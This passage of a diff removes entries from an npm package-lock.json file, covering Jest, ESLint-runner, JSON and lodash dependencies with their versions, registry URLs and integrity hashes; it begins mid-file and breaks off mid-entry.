"node_modules/jest-runner-eslint/node_modules/jest-message-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-28.1.3.tgz", - "integrity": "sha512-PFdn9Iewbt575zKPf1286Ht9EPoJmYT7P0kY+RibeYZ2XtOr53pDLEFoTWXbd1h4JiGiWpTBC84fc8xMXQMb7g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^28.1.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^28.1.3", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-mock": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-28.1.3.tgz", - "integrity": "sha512-o3J2jr6dMMWYVH4Lh/NKmDXdosrsJgi4AviS8oXLujcjpCMBb1FMsblDnOXKZKfSiHLxYub1eS0IHuRXsio9eA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-regex-util": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-28.0.2.tgz", - "integrity": "sha512-4s0IgyNIy0y9FK+cjoVYoxamT7Zeo7MhzqRGx7YDYmaQn1wucY9rotiGkBzzcMXTtjrCAP/f7f+E0F7+fxPNdw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-resolve": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-28.1.3.tgz", - "integrity": "sha512-Z1W3tTjE6QaNI90qo/BJpfnvpxtaFTFw5CDgwpyE/Kz8U/06N1Hjf4ia9quUhCh39qIGWF1ZuxFiBiJQwSEYKQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^28.1.3", - "jest-validate": "^28.1.3", - "resolve": "^1.20.0", - "resolve.exports": "^1.1.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-runner": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-28.1.3.tgz", - "integrity": "sha512-GkMw4D/0USd62OVO0oEgjn23TM+YJa2U2Wu5zz9xsQB1MxWKDOlrnykPxnMsN0tnJllfLPinHTka61u0QhaxBA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/console": "^28.1.3", - "@jest/environment": "^28.1.3", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "graceful-fs": "^4.2.9", - "jest-docblock": "^28.1.1", - "jest-environment-node": "^28.1.3", - "jest-haste-map": "^28.1.3", - "jest-leak-detector": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-resolve": "^28.1.3", - "jest-runtime": "^28.1.3", - "jest-util": "^28.1.3", - "jest-watcher": "^28.1.3", - "jest-worker": "^28.1.3", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-runtime": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-28.1.3.tgz", - "integrity": "sha512-NU+881ScBQQLc1JHG5eJGU7Ui3kLKrmwCPPtYsJtBykixrM2OhVQlpMmFWJjMyDfdkGgBMNjXCGB/ebzsgNGQw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/globals": "^28.1.3", - "@jest/source-map": "^28.1.2", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "execa": "^5.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-resolve": "^28.1.3", - "jest-snapshot": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-snapshot": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-28.1.3.tgz", - "integrity": "sha512-4lzMgtiNlc3DU/8lZfmqxN3AYD6GGLbl+72rdBpXvcV+whX7mDrREzkPdp2RnmfIiWBg1YbuFSkXduF2JcafJg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^28.1.3", - "graceful-fs": "^4.2.9", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-haste-map": "^28.1.3", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "natural-compare": "^1.4.0", - "pretty-format": "^28.1.3", - "semver": "^7.3.5" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-28.1.3.tgz", - "integrity": "sha512-XdqfpHwpcSRko/C35uLYFM2emRAltIIKZiJ9eAmhjsj0CqZMa0p1ib0R5fWIqGhn1a103DebTbpqIaP1qCQ6tQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-validate": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-28.1.3.tgz", - "integrity": "sha512-SZbOGBWEsaTxBGCOpsRWlXlvNkvTkY0XxRfh7zYmvd8uL5Qzyg0CHAXiXKROflh801quA6+/DsT4ODDthOC/OA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^28.0.2", - "leven": "^3.1.0", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-watcher": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-28.1.3.tgz", - "integrity": "sha512-t4qcqj9hze+jviFPUN3YAtAEeFnr/azITXQEMARf5cMwKY2SMBRnCQTXLixTl20OR6mLh9KLMrgVJgJISym+1g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/test-result": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "jest-util": "^28.1.3", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-worker": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-28.1.3.tgz", - "integrity": "sha512-CqRA220YV/6jCo8VWvAt1KKx6eek1VIHMPeLEbpcfSfkEeWyBNppynM/o6q+Wmw+sOhos2ml34wZbSX3G13//g==", - "dev": true, - "dependencies": { - "@types/node": "*", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/pretty-format": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-28.1.3.tgz", - "integrity": "sha512-8gFb/To0OmxHR9+ZTb14Df2vNxdGCX8g1xWGUTqUw5TiZvcQf5sHKObd5UcPyLLyowNwDAMTF3XWOG1B6mxl1Q==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/schemas": "^28.1.3", - "ansi-regex": "^5.0.1", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/resolve.exports": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-1.1.1.tgz", - "integrity": "sha512-/NtpHNDN7jWhAaQ9BvBUYZ6YTXsRBgfqWFWP7BZBaoMJO/I3G5OFzvTuWNlZC3aPjins1F+TNrLKsGbH4rfsRQ==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runner-eslint/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "node_modules/jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", - "engines": { - "node": ">= 10.16.0" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stable-stringify-without-jsonify": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", - "integrity": "sha1-nbe1lJatPzz+8wp1FC0tkwrXJlE=", - "dev": true, - "peer": true - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", - "dependencies": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - }, - "bin": { - "jsonpath": "bin/jsonpath-cli.js", - "jsonpath-plus": "bin/jsonpath-cli.js" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/levn": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", - "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", - "dev": true, - "peer": true, - "dependencies": { - "prelude-ls": "^1.2.1", - "type-check": "~0.4.0" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/lines-and-columns": { - "version": "1.1.6", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.1.6.tgz", - "integrity": "sha1-HADHQ7QzzQpOgHWPe2SldEDZ/wA=", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.clonedeep": { - "version": "4.5.0", - "resolved": "https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz", - "integrity": "sha1-4j8/nE+Pvd6HJSnBBxhXoIblzO8=", - "dev": true, - "peer": true - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "node_modules/lodash.merge": { - "version": "4.6.2", - "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", - "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", - "dev": true, - "peer": true - }, - "node_modules/lodash.truncate": { - "version": "4.4.2", - "resolved": "https://registry.npmjs.org/lodash.truncate/-/lodash.truncate-4.4.2.tgz", - "integrity": "sha1-WjUNoLERO4N+z//VgSy+WNbq4ZM=", - "dev": true, - "peer": true - }, - "node_modules/make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "dependencies": { - "semver": "^7.5.3" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", - "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", - "dev": true, - "dependencies": { - "braces": "^3.0.3", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.0.tgz", - "integrity": "sha512-oGZRv2OT1lO2UF1zUcwdTb3wqUwI0kBGTgt/T7OdSj6M6N5m3o5uPf0AIW6lVxGGoiWUR7e2AwTE+xiwK8WQig==", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "engines": { - "node": ">= 18" - } - }, - "node_modules/minizlib/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": 